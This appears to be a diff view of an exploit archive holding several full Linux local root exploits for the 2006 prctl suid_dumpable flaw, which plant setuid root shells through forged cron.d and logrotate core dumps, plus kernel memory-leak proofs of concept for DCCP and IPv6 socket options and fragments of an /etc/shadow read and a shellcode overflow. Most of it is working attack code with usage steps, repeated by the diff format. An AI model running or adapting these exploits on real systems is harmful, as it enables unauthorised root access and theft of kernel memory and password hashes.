"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
char cronstring[BUFSIZE];
char fname[BUFSIZE];
struct timeval te;
void sh(int sn) {
execl(fname, fname, (char *) NULL);
}
int main(int argc, char *argv[]) {
int nw, pid;
if (geteuid() == 0) {
printf("[+] getting root shell\n");
setuid(0);
setgid(0);
if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
perror("[-] execle");
return 1;
}
}
printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
/* get our file name */
if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
perror("[-] readlink");
printf("This is not fatal, rewrite the exploit\n");
}
if (signal(SIGUSR1, sh) == SIG_ERR) {
perror("[-] signal");
return 1;
}
printf("[+] Installed signal handler\n");
/* Let us create core files */
setrlimit(RLIMIT_CORE, &myrlimit);
if (chdir(CROND) == -1) {
perror("[-] chdir");
return 1;
}
/* exploit the flaw */
if (prctl(PR_SET_DUMPABLE, 2) == -1) {
perror("[-] prtctl");
printf("Is you kernel version >= 2.6.13 ?\n");
return 1;
}
printf("[+] We are suidsafe dumpable!\n");
/* Forge the string for our core dump */
nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
if (nw >= sizeof(cronstring)) {
printf("[-] cronstring is too small\n");
return 1;
}
printf("[+] Malicious string forged\n");
if ((pid=fork()) == -1) {
perror("[-] fork");
return 1;
}
if (pid == 0) {
/* This is not the good way to do it ;) */
sleep(120);
exit(0);
}
/* SEGFAULT the child */
printf("[+] Segfaulting child\n");
if (kill(pid, 11) == -1) {
perror("[-] kill");
return 1;
}
if (gettimeofday(&te, NULL) == 0)
printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
sleep(120);
printf("[-] It looks like the exploit failed\n");
return 1;
}
// milw0rm.com [2006-07-12]
/* Linux >= 2.6.13 prctl kernel exploit
*
* (C) Julien TINNES
*
* If you read the Changelog from 2.6.13 you've probably seen:
* [PATCH] setuid core dump
*
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
* user setable argument to PR_SET_DUMPABLE.
*
* This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable.
*
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>
#define CROND "/etc/cron.d"
#define BUFSIZE 2048
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
char cronstring[BUFSIZE];
char fname[BUFSIZE];
struct timeval te;
void sh(int sn) {
execl(fname, fname, (char *) NULL);
}
int main(int argc, char *argv[]) {
int nw, pid;
if (geteuid() == 0) {
printf("[+] getting root shell\n");
setuid(0);
setgid(0);
if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
perror("[-] execle");
return 1;
}
}
printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
/* get our file name */
if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
perror("[-] readlink");
printf("This is not fatal, rewrite the exploit\n");
}
if (signal(SIGUSR1, sh) == SIG_ERR) {
perror("[-] signal");
return 1;
}
printf("[+] Installed signal handler\n");
/* Let us create core files */
setrlimit(RLIMIT_CORE, &myrlimit);
if (chdir(CROND) == -1) {
perror("[-] chdir");
return 1;
}
/* exploit the flaw */
if (prctl(PR_SET_DUMPABLE, 2) == -1) {
perror("[-] prtctl");
printf("Is you kernel version >= 2.6.13 ?\n");
return 1;
}
printf("[+] We are suidsafe dumpable!\n");
/* Forge the string for our core dump */
nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
if (nw >= sizeof(cronstring)) {
printf("[-] cronstring is too small\n");
return 1;
}
printf("[+] Malicious string forged\n");
if ((pid=fork()) == -1) {
perror("[-] fork");
return 1;
}
if (pid == 0) {
/* This is not the good way to do it ;) */
sleep(120);
exit(0);
}
/* SEGFAULT the child */
printf("[+] Segfaulting child\n");
if (kill(pid, 11) == -1) {
perror("[-] kill");
return 1;
}
if (gettimeofday(&te, NULL) == 0)
printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
sleep(120);
printf("[-] It looks like the exploit failed\n");
return 1;
}
// milw0rm.com [2006-07-12]

View file

@ -1,111 +1,111 @@
/*
* $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $
*
* raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges
* via the PR_SET_DUMPABLE argument of the prctl function and a program that
* causes a core dump file to be created in a directory for which the user does
* not have permissions (CVE-2006-2451).
*
* Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO!
* CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";))
*
* Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug.
*
* NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this
* means that distributions that use a different configuration (namely Dillon's
* crontab on Slackware Linux) can be vulnerable but not directly exploitable.
*
* Usage:
* $ gcc raptor_prctl.c -o raptor_prctl -Wall
* [exploit must be dinamically linked]
* $ ./raptor_prctl
* [...]
* sh-3.00#
*
* Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
char payload[] = /* commands to be executed by privileged crond */
"\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void)
{
int pid, i;
struct rlimit corelimit;
struct stat st;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */
system(pwnage);
/* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
/* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* did it work? */
sleep(3);
if (stat("/etc/cron.d/core", &st) < 0) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1);
}
fprintf(stderr, "Ready to uncork the champagne? ");
fprintf(stderr, "Please wait a couple of minutes;)\n");
/* wait for crond to execute our evil entry */
for (i = 0; i < 124; i += 2) {
if (stat("/tmp/pwned", &st) < 0) {
fprintf(stderr, "\nError: Check /tmp/pwned!\n");
exit(1);
}
if (st.st_uid == 0)
break;
fprintf(stderr, ".");
sleep(2);
}
/* timeout reached? */
if (i > 120) {
fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n");
exit(1);
}
/* total pwnage */
fprintf(stderr, "CAMPIONI DEL MONDO!\n\n");
system("/tmp/pwned");
exit(0);
}
// milw0rm.com [2006-07-13]
/*
* $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $
*
* raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges
* via the PR_SET_DUMPABLE argument of the prctl function and a program that
* causes a core dump file to be created in a directory for which the user does
* not have permissions (CVE-2006-2451).
*
* Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO!
* CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";))
*
* Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug.
*
* NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this
* means that distributions that use a different configuration (namely Dillon's
* crontab on Slackware Linux) can be vulnerable but not directly exploitable.
*
* Usage:
* $ gcc raptor_prctl.c -o raptor_prctl -Wall
* [exploit must be dinamically linked]
* $ ./raptor_prctl
* [...]
* sh-3.00#
*
* Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
char payload[] = /* commands to be executed by privileged crond */
"\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void)
{
int pid, i;
struct rlimit corelimit;
struct stat st;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */
system(pwnage);
/* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
/* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* did it work? */
sleep(3);
if (stat("/etc/cron.d/core", &st) < 0) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1);
}
fprintf(stderr, "Ready to uncork the champagne? ");
fprintf(stderr, "Please wait a couple of minutes;)\n");
/* wait for crond to execute our evil entry */
for (i = 0; i < 124; i += 2) {
if (stat("/tmp/pwned", &st) < 0) {
fprintf(stderr, "\nError: Check /tmp/pwned!\n");
exit(1);
}
if (st.st_uid == 0)
break;
fprintf(stderr, ".");
sleep(2);
}
/* timeout reached? */
if (i > 120) {
fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n");
exit(1);
}
/* total pwnage */
fprintf(stderr, "CAMPIONI DEL MONDO!\n\n");
system("/tmp/pwned");
exit(0);
}
// milw0rm.com [2006-07-13]

View file

@ -1,64 +1,64 @@
#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp
# maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code...
#
# zmia23@yahoo.com
cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__
cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh
# milw0rm.com [2006-07-14]
#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp
# maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code...
#
# zmia23@yahoo.com
cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__
cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh
# milw0rm.com [2006-07-14]

View file

@ -1,108 +1,108 @@
/*
* $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
*
* raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
* the PR_SET_DUMPABLE argument of the prctl function and a program that causes
* a core dump file to be created in a directory for which the user does not
* have permissions (CVE-2006-2451).
*
* This exploit uses the logrotate attack vector: of course, you must be able
* to chdir() into the /etc/logrotate.d directory in order to exploit the
* vulnerability. I've experimented a bit with other attack vectors as well,
* with no luck: at (/var/spool/atjobs/) uses file name information to
* establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x
* permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled
* coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
*
* Thanks to Solar Designer for the interesting discussion on attack vectors.
*
* NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
*
* Usage:
* $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
* [exploit must be statically linked]
* $ ./raptor_prctl2
* [please wait until logrotate is run]
* $ ls -l /tmp/pwned
* -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned
* $ /tmp/pwned
* sh-3.00# id
* uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
* sh-3.00#
* [don't forget to delete /tmp/pwned!]
*
* Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void)
{
int pid;
struct rlimit corelimit;
struct stat st;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */
system(pwnage);
/* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
/* let's create a fake logfile in /var/log */
if (!(pid = fork())) {
chdir("/var/log");
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) {
chdir("/etc/logrotate.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* did it work? */
sleep(3);
if ((stat("/var/log/core", &st) < 0) ||
(stat("/etc/logrotate.d/core", &st) < 0)) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1);
}
/* total pwnage */
fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
exit(0);
}
// milw0rm.com [2006-07-18]
/*
* $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
*
* raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
* the PR_SET_DUMPABLE argument of the prctl function and a program that causes
* a core dump file to be created in a directory for which the user does not
* have permissions (CVE-2006-2451).
*
* This exploit uses the logrotate attack vector: of course, you must be able
* to chdir() into the /etc/logrotate.d directory in order to exploit the
* vulnerability. I've experimented a bit with other attack vectors as well,
* with no luck: at (/var/spool/atjobs/) uses file name information to
* establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x
* permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled
* coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
*
* Thanks to Solar Designer for the interesting discussion on attack vectors.
*
* NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
*
* Usage:
* $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
* [exploit must be statically linked]
* $ ./raptor_prctl2
* [please wait until logrotate is run]
* $ ls -l /tmp/pwned
* -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned
* $ /tmp/pwned
* sh-3.00# id
* uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
* sh-3.00#
* [don't forget to delete /tmp/pwned!]
*
* Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void)
{
int pid;
struct rlimit corelimit;
struct stat st;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */
system(pwnage);
/* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
/* let's create a fake logfile in /var/log */
if (!(pid = fork())) {
chdir("/var/log");
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) {
chdir("/etc/logrotate.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* did it work? */
sleep(3);
if ((stat("/var/log/core", &st) < 0) ||
(stat("/etc/logrotate.d/core", &st) < 0)) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1);
}
/* total pwnage */
fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
exit(0);
}
// milw0rm.com [2006-07-18]

View file

@ -143,6 +143,6 @@ int main( int argc, char * argv[] )
execve( execve_argv[0], execve_argv, NULL );
return( -1 );
}
// milw0rm.com [2000-12-02]
// milw0rm.com [2000-12-02]

View file

@ -64,6 +64,6 @@ $buffer .= $shellcode;
# then: export DISPLAY=your-ip:0.0 - and execute the exploit.
exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\"");
# milw0rm.com [2001-01-15]
# milw0rm.com [2001-01-15]

View file

@ -27,6 +27,6 @@ echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# milw0rm.com [2001-01-25]
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# milw0rm.com [2001-01-25]

11
platforms/linux/local/30093.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24192/info
Mutt is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.
An attacker can exploit this issue to execute arbitrary code with the with the privileges of the victim. Failed exploit attempts will result in a denial of service.
# USERNAME=$(perl -e 'print "a" x 31')
# useradd -c '&&&&&&&&& your-favourite-ascii-shellcode-here' $USERNAME
# echo alias billg $USERNAME >~/.muttrc
# mutt billg
# Segmentation fault (core dumped)

View file

@ -1,39 +1,39 @@
#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>
#define BUFSIZE 0x10000000
int main(int argc, char *argv[])
{
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == (void*)-1) {
printf("Alloc failed\n");
return -1;
}
/* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33);
if (s == -1) {
fprintf(stderr, "socket failure!\n");
return 1;
}
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
int len = BUFSIZE;
int x = getsockopt(s, 269, 11, mem, &len);
if (x == -1)
perror("SETSOCKOPT");
else
printf("SUCCESS\n");
write(1, mem, BUFSIZE);
return 0;
}
// milw0rm.com [2007-03-28]
#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>
#define BUFSIZE 0x10000000
int main(int argc, char *argv[])
{
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == (void*)-1) {
printf("Alloc failed\n");
return -1;
}
/* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33);
if (s == -1) {
fprintf(stderr, "socket failure!\n");
return 1;
}
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
int len = BUFSIZE;
int x = getsockopt(s, 269, 11, mem, &len);
if (x == -1)
perror("SETSOCKOPT");
else
printf("SUCCESS\n");
write(1, mem, BUFSIZE);
return 0;
}
// milw0rm.com [2007-03-28]

View file

@ -1,84 +1,84 @@
/*
* Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept
* dreyer 07-2007
* Osu, Tatakae, Sexy Pandas!
*
* Dumps to stdout the memory mapped between INI and END.
*
* CVE: CVE-2007-1000 BID: 22904
*
* Affected: Linux Kernel < 2.6.20.2
*
* http://bugzilla.kernel.org/show_bug.cgi?id=8134
*
* Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
*
* For free!!! ( worth 600 EUR in zerobay! )
*
*/
#include <sys/mman.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000
#define ENDADDR 0xd0000000
unsigned int i;
int main(int argc, char *argv[]) {
int s;
unsigned int optlen;
void *ptr;
char value[10240];
char text[12];
fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
"dreyer '07 - free feels better\n"
"Dumping %p - %p to stdout\n",INIADDR,ENDADDR);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
/* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);
/* Make 0x00000000 address valid */
ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (ptr != NULL) {
perror("mmap");
exit(-1);
}
memset(ptr,0,4096);
/* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt =
* 0x00000000 + 8 */
ptr=(char *)((char *)ptr+HOPOPT_OFFSET);
i=INIADDR;
while(i<ENDADDR) {
/* Put in hopopt the address we want to read */
*((int *)ptr)=i;
optlen=10240;
/* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */
getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
if(optlen>0) {
sprintf(text,"\n%08x:",i);
write(1,text,strlen(text));
write(1,value,optlen);
i=i+optlen;
} else {
/* We could not read this portion because of some error, skip it */
i=i+4;
}
}
return 0;
}
// milw0rm.com [2007-07-10]
/*
* Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept
* dreyer 07-2007
* Osu, Tatakae, Sexy Pandas!
*
* Dumps to stdout the memory mapped between INI and END.
*
* CVE: CVE-2007-1000 BID: 22904
*
* Affected: Linux Kernel < 2.6.20.2
*
* http://bugzilla.kernel.org/show_bug.cgi?id=8134
*
* Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
*
* For free!!! ( worth 600 EUR in zerobay! )
*
*/
#include <sys/mman.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000
#define ENDADDR 0xd0000000
unsigned int i;
int main(int argc, char *argv[]) {
int s;
unsigned int optlen;
void *ptr;
char value[10240];
char text[12];
fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
"dreyer '07 - free feels better\n"
"Dumping %p - %p to stdout\n",INIADDR,ENDADDR);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
/* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);
/* Make 0x00000000 address valid */
ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (ptr != NULL) {
perror("mmap");
exit(-1);
}
memset(ptr,0,4096);
/* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt =
* 0x00000000 + 8 */
ptr=(char *)((char *)ptr+HOPOPT_OFFSET);
i=INIADDR;
while(i<ENDADDR) {
/* Put in hopopt the address we want to read */
*((int *)ptr)=i;
optlen=10240;
/* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */
getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
if(optlen>0) {
sprintf(text,"\n%08x:",i);
write(1,text,strlen(text));
write(1,value,optlen);
